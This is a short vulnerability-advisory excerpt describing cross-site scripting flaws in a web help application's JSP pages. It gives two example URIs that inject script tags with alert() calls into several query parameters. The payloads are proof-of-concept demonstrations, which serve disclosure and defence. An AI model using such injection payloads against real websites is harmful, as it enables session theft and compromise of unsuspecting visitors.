Attackers can exploit these issues by enticing an unsuspecting victim into following a malicious URI.

The following example URIs are available:

http://www.example.com/ReqWebHelp/advanced/workingSet.jsp?operation=add*/--&gt;&lt;/script&gt;&lt;script&gt;alert(289325)&lt;/script&gt;&amp;workingSet=

http://www.example.com/ReqWebHelp/basic/searchView.jsp?searchWord=&gt;''&gt;&lt;script&gt;alert(306531)&lt;/script&gt;&amp;maxHits=&gt;''&gt;&lt;script&gt;alert(306531)&lt;/script&gt;&amp;scopedSearch=&gt;''&gt;&lt;script&gt;alert(306531)&lt;/script&gt;&amp;scope=&gt;''&gt;&lt;script&gt;alert(306531)&lt;/script&gt;